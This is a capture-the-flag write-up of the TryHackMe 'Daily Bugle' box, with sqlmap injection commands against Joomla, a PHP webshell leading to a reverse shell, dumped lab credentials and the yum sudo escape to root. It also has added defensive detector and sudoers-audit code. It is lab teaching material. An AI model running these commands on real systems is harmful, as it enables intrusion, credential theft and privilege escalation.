#sqlmap #tryhackme

![[Pasted image 20250627000258.png]]

---

# Port scanning - Nmap

Found 3 open TCP ports after scanning the full port range.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p-
[sudo] password for parallels:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 20:52 CDT
Nmap scan report for 10.10.100.56
Host is up (0.13s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3306/tcp open  mysql

Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds
```

Let's run another scan against the ports found, this time with default scripts and version detection.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn]
└─$ nmap -sC -sV $IP -p 22,80,3306
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 20:54 CDT
Nmap scan report for 10.10.100.56
Host is up (0.13s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
|   256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_  256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519)
80/tcp   open  http    Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
3306/tcp open  mysql   MariaDB 10.3.23 or earlier (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds
```

# Footprinting

##### Port 80

When you navigate to the given IP address (in my case 10.10.100.56), you see this webpage.

![[Pasted image 20250626205834.png]]

`/robots.txt` reveals many directories that we could potentially explore for information.

![[Pasted image 20250626210118.png]]

`/administrator` confirms that the CMS running is Joomla. However, we haven't found any credentials yet. I tried default passwords like `admin`, but they didn't work.

![[Pasted image 20250626210847.png]]

I tried every other directory listed in `/robots.txt`, but none of them had anything interesting except `/administrator`. I was stuck at the `/administrator` page, so I decided to run `gobuster` against that directory.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ gobuster dir -u http://$IP/administrator -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.100.56/administrator
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/help                 (Status: 301) [Size: 247] [--> http://10.10.100.56/administrator/help/]
/templates            (Status: 301) [Size: 252] [--> http://10.10.100.56/administrator/templates/]
/modules              (Status: 301) [Size: 250] [--> http://10.10.100.56/administrator/modules/]
/includes             (Status: 301) [Size: 251] [--> http://10.10.100.56/administrator/includes/]
/language             (Status: 301) [Size: 251] [--> http://10.10.100.56/administrator/language/]
/components           (Status: 301) [Size: 253] [--> http://10.10.100.56/administrator/components/]
/cache                (Status: 301) [Size: 248] [--> http://10.10.100.56/administrator/cache/]
/logs                 (Status: 301) [Size: 247] [--> http://10.10.100.56/administrator/logs/]
```

In the path `/administrator/language/en-GB/en-GB.xml`, I found the version of the Joomla CMS.

![[Pasted image 20250626212913.png]]

Searchsploit reveals a known SQL injection vulnerability in the Joomla version I identified.

![[Pasted image 20250626213548.png]]

Looking at the PoC, it explains that we can exploit this vulnerability using `sqlmap`. I used the following command:

```bash
sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
```

![[Pasted image 20250626221106.png]]

`sqlmap` revealed 5 available databases.

![[Pasted image 20250626220905.png]]

Let's first enumerate the tables of the `joomla` database.

```bash
sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla --tables
```

Found 73 tables, and the `#__users` table stood out to me.

```bash
<SNIP>
| #__update_sites_extensions |
| #__update_sites            |
| #__updates                 |
| #__user_keys               |
| #__user_notes              |
| #__user_profiles           |
| #__user_usergroup_map      |
| #__usergroups              |
| #__users                   |
| #__utf8_conversion         |
| #__viewlevels              |
```

Let's enumerate the columns inside that table.

```bash
sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla -T '#__users' --columns
```

Found 6 columns!
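From the defender's side, the injection above leaves a distinctive trace: requests to `option=com_fields` whose `list[fullordering]` value carries SQL instead of a column name. The following is an added example, not part of the original writeup, that flags such requests in Apache "combined" format access logs; the log lines are constructed, and the marker list and the `classify`/`suspicious` names are my own.

```python
# Added example (not part of the original writeup): flag attempts to exploit
# the Joomla com_fields SQL injection in Apache "combined" access logs.
# The injected parameter is list[fullordering]; sqlmap probes it with
# error-based payloads such as updatexml()/extractvalue(), as used above.
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# A legitimate ordering value is a column name plus ASC/DESC; none of these
# SQL fragments belongs there (assumed marker list, extend as needed).
SQLI_MARKERS = ("updatexml(", "extractvalue(", "concat(", "select ", "union ", "sleep(", "benchmark(")

def classify(line):
    """Parse one log line; None if unparseable, else a record with detection reasons."""
    m = LOG_RE.match(line)
    if not m:
        return None
    qs = parse_qs(urlsplit(m["path"]).query, keep_blank_values=True)
    reasons = []
    if qs.get("option", [""])[0] == "com_fields":
        for val in qs.get("list[fullordering]", []):
            # unquote once more so a double-encoded payload is still inspected
            if any(mk in unquote_plus(val).lower() for mk in SQLI_MARKERS):
                reasons.append("sqli_payload_in_list[fullordering]")
                break
    # The writeup used --random-agent, so the UA check alone is not enough;
    # it is only a bonus signal when the default sqlmap agent is left in place.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap_user_agent")
    return {"ip": m["ip"], "status": m["status"], "path": m["path"], "reasons": reasons}

def suspicious(lines):
    """Return the parsed records that carry at least one detection reason."""
    return [r for r in map(classify, lines) if r and r["reasons"]]

# Constructed sample log lines (not captured from the target); IPs mirror the lab above.
SAMPLE_LOG = [
    '10.23.133.183 - - [26/Jun/2025:22:11:06 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml%281%2Cconcat%280x7e%2Cuser%28%29%29%2C1%29 HTTP/1.1" 500 1052 "-" "sqlmap/1.9#stable (https://sqlmap.org)"',
    '10.0.0.5 - - [26/Jun/2025:22:12:00 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.ordering+ASC HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.7 - - [26/Jun/2025:22:12:30 -0500] "GET / HTTP/1.1" 200 8867 "-" "Mozilla/5.0 (Windows NT 10.0)"',
    '10.23.133.183 - - [26/Jun/2025:22:13:44 -0500] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=%28select%201%20from%20%28select%20sleep%285%29%29x%29 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7)"',
]

if __name__ == "__main__":
    for rec in suspicious(SAMPLE_LOG):
        print(rec["ip"], rec["status"], rec["reasons"])
```

Feeding the real access log through `suspicious()` would surface the whole `--dbs`/`--tables`/`--dump` session, since every probe hits the same parameter.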
```bash
Database: joomla
Table: joomla.#__users
[6 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| name     | non-numeric |
| email    | non-numeric |
| id       | numeric     |
| params   | numeric     |
| password | non-numeric |
| username | non-numeric |
+----------+-------------+
```

We successfully enumerated the database name, its tables, and the columns. Let's dump the data now.

```bash
sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla -T '#__users' -C "name,email,id,params,password,username" --dump
```

It returned only 1 entry.

- `name`: 'Super User'
- `email`: '[email protected]'
- `id`: 811
- `params`: ''
- `password`: '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm'
- `username`: 'jonah'

![[Pasted image 20250626224429.png]]

Let's crack Jonah's password.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt
```

![[Pasted image 20250626225544.png]]

# Exploit

Successfully logged into the Joomla administrator panel with the credentials found. Now let's explore the website to see if there is any way we could get a reverse shell.

![[Pasted image 20250626230251.png]]

Navigate to `Templates`. I selected the `Protostar` template.

![[Pasted image 20250626231427.png]]

There are several PHP files under the Protostar template. I plan to edit the `component.php` file and insert a very short PHP one-liner (`<?php system('uname -a'); ?>`) to verify that the injection point is reachable and to assess the possibility of achieving a reverse shell.

![[Pasted image 20250626231551.png]]

After saving the changes, I accessed `/templates/protostar/component.php` and successfully received the output of the PHP one-liner.

![[Pasted image 20250626232148.png]]

Let's modify the one-liner to establish a reverse shell and set up a listener to catch the incoming connection.
![[Pasted image 20250626232626.png]]

Got the reverse shell!

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.23.133.183] from (UNKNOWN) [10.10.100.56] 49982
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
```

In `/var/www/html`, a file named `configuration.php` stood out to me because of its name. My hunch was right: it contains a `$password` variable.

```bash
bash-4.2$ cat configuration.php
<?php
class JConfig {
	public $offline = '0';
	public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.';
	public $display_offline_message = '1';
	public $offline_image = '';
	public $sitename = 'The Daily Bugle';
	public $editor = 'tinymce';
	public $captcha = '0';
	public $list_limit = '20';
	public $access = '1';
	public $debug = '0';
	public $debug_lang = '0';
	public $dbtype = 'mysqli';
	public $host = 'localhost';
	public $user = 'root';
	public $password = 'nv5uz9r3ZEDzVjNu';
	public $db = 'joomla';
	public $dbprefix = 'fb9j5_';
	public $live_site = '';
	public $secret = 'UAMBRWzHO3oFPmVC';
	public $gzip = '0';
	public $error_reporting = 'default';
	public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}';
	public $ftp_host = '127.0.0.1';
	public $ftp_port = '21';
	public $ftp_user = '';
	public $ftp_pass = '';
	public $ftp_root = '';
	public $ftp_enable = '0';
	public $offset = 'UTC';
	public $mailonline = '1';
	public $mailer = 'mail';
	public $mailfrom = '[email protected]';
	public $fromname = 'The Daily Bugle';
	public $sendmail = '/usr/sbin/sendmail';
	public $smtpauth = '0';
	public $smtpuser = '';
	public $smtppass = '';
	public $smtphost = 'localhost';
	public $smtpsecure = 'none';
	public $smtpport = '25';
	public $caching = '0';
	public $cache_handler = 'file';
	public $cachetime = '15';
	public $cache_platformprefix = '0';
	public $MetaDesc = 'New York City tabloid newspaper';
	public $MetaKeys = '';
	public $MetaTitle = '1';
	public $MetaAuthor = '1';
	public $MetaVersion = '0';
	public $robots = '';
	public $sef = '1';
	public $sef_rewrite = '0';
	public $sef_suffix = '0';
	public $unicodeslugs = '0';
	public $feed_limit = '10';
	public $feed_email = 'none';
	public $log_path = '/var/www/html/administrator/logs';
	public $tmp_path = '/var/www/html/tmp';
	public $lifetime = '15';
	public $session_handler = 'database';
	public $shared_session = '0';
```

However, I tried `root:nv5uz9r3ZEDzVjNu` and it did not work.

```bash
bash-4.2$ su root
Password:
su: Authentication failure
```

Then I remembered I had found a user named `jjameson` in `/home`. What if I try that same password with the username `jjameson`?

```bash
bash-4.2$ ls -la
total 0
drwxr-xr-x.  3 root     root      22 Dec 14  2019 .
dr-xr-xr-x. 17 root     root     244 Dec 14  2019 ..
drwx------.  2 jjameson jjameson  99 Dec 15  2019 jjameson
```

That set of credentials got me successfully logged in!

```bash
bash-4.2$ su jjameson
Password:
[jjameson@dailybugle home]$ whoami
jjameson
```

Found `user.txt`.

```bash
[jjameson@dailybugle ~]$ cat user.txt
27a2...
```

# Privilege Escalation

`sudo -l` reveals that we can run `/usr/bin/yum` with root privileges.

```bash
[jjameson@dailybugle ~]$ sudo -l
Matching Defaults entries for jjameson on dailybugle:
    !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
    env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
    env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
    env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
    env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
    secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin

User jjameson may run the following commands on dailybugle:
    (ALL) NOPASSWD: /usr/bin/yum
```

As soon as I saw that `sudo -l` returned some commands, I immediately opened my browser and went to `gtfobins.github.io`.
As expected, it had guidance on how to exploit the `yum` binary with `sudo`. I followed the exact steps mentioned there.

```bash
[jjameson@dailybugle ~]$ TF=$(mktemp -d)
[jjameson@dailybugle ~]$ cat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
> EOF
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF
> [main]
> enabled=1
> EOF
[jjameson@dailybugle ~]$
[jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
>   os.execl('/bin/sh','/bin/sh')
> EOF
[jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
root
```

Got `root.txt`!

```bash
sh-4.2# cd /root
sh-4.2# ls
anaconda-ks.cfg  root.txt
sh-4.2# cat root.txt
eec3...
```
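The root cause here is a single sudoers line: `yum` accepts a caller-supplied config file and plugin directory, so `(ALL) NOPASSWD: /usr/bin/yum` with no argument restriction is a root shell. The following added example (mine, not part of the original writeup) audits sudoers-style rules for that pattern; the sample sudoers text is constructed, the `SHELL_EQUIVALENT` list is an assumption to extend for your environment, and it also shows why an argument-restricted rule such as `yum update` does not trigger.

```python
# Added example (not part of the original writeup): audit sudoers-style rules
# for the misconfiguration that gave root above, "(ALL) NOPASSWD: /usr/bin/yum".
import re

# Binaries treated as shell-equivalent when run as root with free arguments
# (yum honours -c and a plugin directory). Assumed list; the page shows only yum.
SHELL_EQUIVALENT = {"ALL", "/usr/bin/yum", "/bin/yum"}

RULE_RE = re.compile(
    r'^(?P<who>\S+)\s+(?P<host>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?'
    r'(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$'
)

def parse_sudoers(text):
    # One record per command spec; Defaults and alias lines are skipped.
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line or line.startswith(("Defaults", "Cmnd_Alias", "User_Alias",
                                        "Host_Alias", "Runas_Alias")):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.rstrip(":") for t in m["tags"].split()}
        runas = (m["runas"] or "root").split(":")[0].strip() or "root"  # omitted runas = root
        for spec in m["cmds"].split(","):
            parts = spec.split()
            rules.append({"who": m["who"], "runas": runas, "nopasswd": "NOPASSWD" in tags,
                          "binary": parts[0], "args": parts[1:]})
    return rules

def findings(text):
    # (severity, user, binary) for each root-level rule on a shell-equivalent binary.
    out = []
    for r in parse_sudoers(text):
        # sudo matches listed arguments exactly, so only an argument-free rule
        # (or a wildcard) lets the caller supply -c and --enableplugin.
        unrestricted = not r["args"] or "*" in " ".join(r["args"])
        if r["runas"] in ("ALL", "root") and r["binary"] in SHELL_EQUIVALENT and unrestricted:
            out.append(("critical" if r["nopasswd"] else "high", r["who"], r["binary"]))
    return out

# Constructed sample (not the target's real file); the jjameson line mirrors sudo -l above.
SAMPLE_SUDOERS = """\
Defaults    env_reset, secure_path=/sbin:/bin:/usr/sbin:/usr/bin
root        ALL=(ALL)       ALL
%wheel      ALL=(ALL)       ALL
jjameson    ALL=(ALL)       NOPASSWD: /usr/bin/yum
webops      ALL=(apache)    NOPASSWD: /usr/bin/yum
backup      ALL=(ALL)       NOPASSWD: /usr/bin/rsync, /usr/bin/yum
ops         ALL=(ALL)       /usr/bin/yum update    # fixed argument list
"""
```

Running `findings(SAMPLE_SUDOERS)` reports `jjameson` and `backup` as critical, the two `ALL` rules as high, and stays silent on `webops` (not root) and `ops` (fixed arguments).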